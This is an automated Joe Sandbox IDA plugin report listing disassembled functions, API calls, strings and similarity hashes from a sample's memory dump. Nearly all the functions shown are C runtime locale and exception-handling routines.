Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 6115acae7903d749c290cbafe032dd2a63f5b932f93131b0072869eddc02f643
Instruction ID: a21304ea7a34a055bbbe4facaf13be3222d3ae6ecc80f749bec7fb0c1cbdb9dd
Opcode Fuzzy Hash: 6115acae7903d749c290cbafe032dd2a63f5b932f93131b0072869eddc02f643
Instruction Fuzzy Hash: 4161C1719046179FEB2ADF28EDC2BBAB7A8FF04301F124079E905CA595E774E980CB50

Function 0032BA03 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0032BAFB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0032BB05
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0032BB12

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 20c64daddf7bcd86dc1239bbe52ef3799959f9e9866b793b16dbeb29174db57a
Instruction ID: 774226090b3418e8168c007966b9b3bc3c69b970568499b6c53057ecca60e83a
Opcode Fuzzy Hash: 20c64daddf7bcd86dc1239bbe52ef3799959f9e9866b793b16dbeb29174db57a
Instruction Fuzzy Hash: 1F31C774D012289BCB22DF64E88979DB7B8BF08310F5041DAE41CAB251EB709F818F54

Function 00330B00 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
Instruction ID: 94fd15e416481c85c88320644dd19a3cff5b296994689b9926e74a8516a342ae
Opcode Fuzzy Hash: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
Instruction Fuzzy Hash: FCF12D71E002199FDF19CFA8C8D06ADB7B1FF88314F158669E819AB391D730AE45CB90

Function 00334869 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00334A96

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 252322b9810b566e48cb5053889bdbbf7d06f754d40353f372a8e19cc6222042
Instruction ID: 24c12c897239e8dffdab6873179d791024db70f8ba112fa6eff1d37341c9c007
Opcode Fuzzy Hash: 252322b9810b566e48cb5053889bdbbf7d06f754d40353f372a8e19cc6222042
Instruction Fuzzy Hash: F9B10A356106099FD716CF28C4C6B65BBA0FF45365F268658E8DACF2A1C335ED91CB40

Function 0032779C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003277B2

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: feead923aac8359e184ae9f6b5941d54bd3d2f22bd321ce3662499d4138224ce
Instruction ID: 49905cfde04e02491659c06694e23a54e24b77f257aeeab6ba176c8af39f3c25
Opcode Fuzzy Hash: feead923aac8359e184ae9f6b5941d54bd3d2f22bd321ce3662499d4138224ce
Instruction Fuzzy Hash: 6851CFB1E052659FEB2ACF58E9CA3AABBF4FB04311F15816AD404EB351D3B49D40CB50

Function 0032DAB4 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 0032DC42

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: eacc52b11be092b221e0db5b5e275d4317c29f8055590accd4c32758d05bdae4
Instruction ID: 829900aa2b0799f28498d18130f2d051adfc4ed9d625cf2c10f1ef397f41cc35
Opcode Fuzzy Hash: eacc52b11be092b221e0db5b5e275d4317c29f8055590accd4c32758d05bdae4
Instruction Fuzzy Hash: E4C11270A00A768FCB2ACF68E4A56BEB7B5BF09310F26461DD4529B791C770EC45CB50

Function 0033DBFF Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0033DC53

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d6853f907748db669b0ae5d7496f04321676c7b5b4f16c197f922625942881f6
Instruction ID: 5edfff6f111239b1532db5da63dc32dce3f7ee19b1559aa7b19dc6a7a9fa42a3
Opcode Fuzzy Hash: d6853f907748db669b0ae5d7496f04321676c7b5b4f16c197f922625942881f6
Instruction Fuzzy Hash: D621D772A64616ABDB2A9F25ECC1E7A77ACEF04310F101079FD05CA141EBB5ED40C750

Function 0033D886 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

EnumSystemLocalesW.KERNEL32(0033D9AC,00000001,00000000,?,-00000050,?,0033DFDD,00000000,?,?,?,00000055,?), ref: 0033D8F8

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ef5c0d085e06a00530405f3495fa44ba8093f94fc6e18483e06e363b0cac533e
Instruction ID: f008e7fb5bef4f7910ed21aecd1a868347c83ff84162eb529ffce42bc13f5029
Opcode Fuzzy Hash: ef5c0d085e06a00530405f3495fa44ba8093f94fc6e18483e06e363b0cac533e
Instruction Fuzzy Hash: 6811483B6007015FDB19AF38D8D16BABB92FF80358F19442CE9868BA40D371B942CB40

Function 0033DE2E Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0033DBC8,00000000,00000000,?), ref: 0033DE5A

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 32d5aca38b9675e2f22da176a524c037c0db1291fa98a42b7dda16ed080c2032
Instruction ID: 76acd53c5938133e2c339927530481a37a8bc7deff20bb1ede4b6e6b451d59ac
Opcode Fuzzy Hash: 32d5aca38b9675e2f22da176a524c037c0db1291fa98a42b7dda16ed080c2032
Instruction Fuzzy Hash: D6F0CD36A10111BBDB255725DC857BB7F58DB50754F160429EC47AB180EB78FE41C590

Function 0033D794 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0033D7E8

Strings

utf8, xrefs: 0033D757

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: d723e0a0da4f7e76feb9c4207c7c957b9d565c567576f7081a489037e79bd116
Instruction ID: 168be6f4ee0c02cb686fc80f6adede0b69f2fea2b2c68e22f2d71970f55251f8
Opcode Fuzzy Hash: d723e0a0da4f7e76feb9c4207c7c957b9d565c567576f7081a489037e79bd116
Instruction Fuzzy Hash: 22F0C836A10115ABC715AB34EC86AFA77ACEF45310F110179F602DF281EA74BD458754

Function 0033D921 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

EnumSystemLocalesW.KERNEL32(0033DBFF,00000001,?,?,-00000050,?,0033DFA1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0033D96B

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fed2b9163ad4dfde9a25675a6aab7aa974d67a5d5d8824f2b4d99f613a076939
Instruction ID: 601d9a3da28ef83a5e62c46fda007d297d912e84685639a3a80dca9f1e13bf60
Opcode Fuzzy Hash: fed2b9163ad4dfde9a25675a6aab7aa974d67a5d5d8824f2b4d99f613a076939
Instruction Fuzzy Hash: CAF0F6362007045FDB165F39ECC1B7ABB95EF85768F06442CF9454B690C771AC42C750

Function 003362CB Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0032E9A9: EnterCriticalSection.KERNEL32(-004E423F,?,00331531,00000000,0034F1E8,0000000C,003314F8,?,?,00334EE2,?,?,0033437E,00000001,00000364,00000001), ref: 0032E9B8

EnumSystemLocalesW.KERNEL32(003362BE,00000001,0034F3D8,0000000C,0033672D,00000000), ref: 00336303

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 820e740149a639afdfb0b0862e95e277e797cfcba091cdd473b4341eb59cbceb
Instruction ID: c2852fd9c014f6b23184bea4157332cb5fccbcf56bc7433c29329629ed138205
Opcode Fuzzy Hash: 820e740149a639afdfb0b0862e95e277e797cfcba091cdd473b4341eb59cbceb
Instruction Fuzzy Hash: D8F04976A10310EFDB01EF98E882B9D77F0FB48720F10816AF411DF2A1CBB559418B54

Function 0033D83B Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003341E0: GetLastError.KERNEL32(?,00000008,0033708C), ref: 003341E4
Part of subcall function 003341E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00334286

EnumSystemLocalesW.KERNEL32(0033D794,00000001,?,?,?,0033DFFF,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0033D872

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e3cc87c0c0273f2f114a422be105f166bb73b22a2f0c97de873380683d27efda
Instruction ID: bce1ff73bd3fdb975c06489d72eca3f344995c40f8a750731886f115bf823f9d
Opcode Fuzzy Hash: e3cc87c0c0273f2f114a422be105f166bb73b22a2f0c97de873380683d27efda
Instruction Fuzzy Hash: 9FF0E53A70020557CF0A9F35EC8576A7F94FFC1764F074058EA058F251C671A982C790

Function 00336831 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00333469,?,20001004,00000000,00000002,?,?,00332A6B), ref: 00336865

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6bd70c445b6c85c9750c11a3d61981a61aad3d2a34b762a8d10667d3d570aa40
Instruction ID: 3ebda9c0a99057a7843de1c94f34d49610dad764989ef22533399151e05fb18e
Opcode Fuzzy Hash: 6bd70c445b6c85c9750c11a3d61981a61aad3d2a34b762a8d10667d3d570aa40
Instruction Fuzzy Hash: B3E01A36501628BBCF132F61DD46B9E3E2AAB45B61F048420F9056D522CBB19920AA94

Function 00327E25 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007E31,003272C3), ref: 00327E2A

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a1c286dd2acefe6ab75e14eb7163eb32078cc41f336646c8b5e3a6fc9e5acca5
Instruction ID: b8377c50117fed6b1300737fc7d06643027536ca7beff4a772a5d6e89e3d4126
Opcode Fuzzy Hash: a1c286dd2acefe6ab75e14eb7163eb32078cc41f336646c8b5e3a6fc9e5acca5
Instruction Fuzzy Hash:

Function 0033E15F Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0033E15F

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3f4079d2330d39a6bf824a2b160f0d2e452a4eae4086edb6b31e2320af9ade30
Instruction ID: 641f805edc9295139d4b35efebacb3b0eb519673da08bb6a7f2d2f2af59512cd
Opcode Fuzzy Hash: 3f4079d2330d39a6bf824a2b160f0d2e452a4eae4086edb6b31e2320af9ade30
Instruction Fuzzy Hash: 4BA012745021008B43004F316A4420937986A8178070440245004C9022DB2054405600

Function 00336B35 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction ID: 673df4f46adfd62a5602687136580add1e548d0e0378f7e97e1082e22ab28a39
Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction Fuzzy Hash: F2E08C72911228FFCB16DB8DC986D8AF3ECEB45B00F2580A6B501D3110C670DE00CBD4

Function 00331FC4 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
Instruction ID: 320bb8980bedb55db532d06d86f648d820748d1a4ce61fd416f7b1ba5a6bf62c
Opcode Fuzzy Hash: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
Instruction Fuzzy Hash: BBC08C345019008ACE3B891082F6BA83364A3D1782F90258CD4024F652C69E9C82DA60

Function 00321EE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00321EF5
std::_Lockit::_Lockit.LIBCPMT ref: 00321F0F
std::_Lockit::~_Lockit.LIBCPMT ref: 00321F30
std::_Lockit::~_Lockit.LIBCPMT ref: 00321F88
std::_Lockit::_Lockit.LIBCPMT ref: 00321FCD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0032201E
__Getctype.LIBCPMT ref: 00322035
std::_Facet_Register.LIBCPMT ref: 0032205F
std::_Lockit::~_Lockit.LIBCPMT ref: 00322078

Part of subcall function 003250AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 003250B6

Strings

bad locale name, xrefs: 00322087

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: d30bb29b61497a986f636479c292b729517ddfd5b9d98fda1d968d7996ae76dc
Instruction ID: 592652dc553115280757ae937e71ad2f371e060afa898c379e700986800ccbe7
Opcode Fuzzy Hash: d30bb29b61497a986f636479c292b729517ddfd5b9d98fda1d968d7996ae76dc
Instruction Fuzzy Hash: 5D41CE31904360AFC322DF28E980B6BB7E0AFA0710F164A5CF8959B252D771E945CB92

Function 003220A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003220B2
std::_Lockit::_Lockit.LIBCPMT ref: 003220CF
std::_Lockit::~_Lockit.LIBCPMT ref: 003220F0
std::_Lockit::~_Lockit.LIBCPMT ref: 0032214B
std::_Lockit::_Lockit.LIBCPMT ref: 0032218C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003221CF
std::_Facet_Register.LIBCPMT ref: 003221F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00322211

Part of subcall function 003250AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 003250B6

Strings

bad locale name, xrefs: 00322220

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: c6e0df05f28e5c999f67ac32bf90d5e3a6e68b324623185f5b43ab480916623e
Instruction ID: e2128c2bc20fccb9b8985b0c24c7e81c58de66e5c460958fb7a2218d2dbe3b2c
Opcode Fuzzy Hash: c6e0df05f28e5c999f67ac32bf90d5e3a6e68b324623185f5b43ab480916623e
Instruction Fuzzy Hash: AB41AD71904361AFC322EF28EC81A5BBBE0BF94710F05496DF9859B212D731EE45CB92

Function 00322FB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00323011
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00323058
Concurrency::cancel_current_task.LIBCPMT ref: 0032311A
Concurrency::cancel_current_task.LIBCPMT ref: 0032311F
Concurrency::cancel_current_task.LIBCPMT ref: 00323124

Strings

bad locale name, xrefs: 00323129
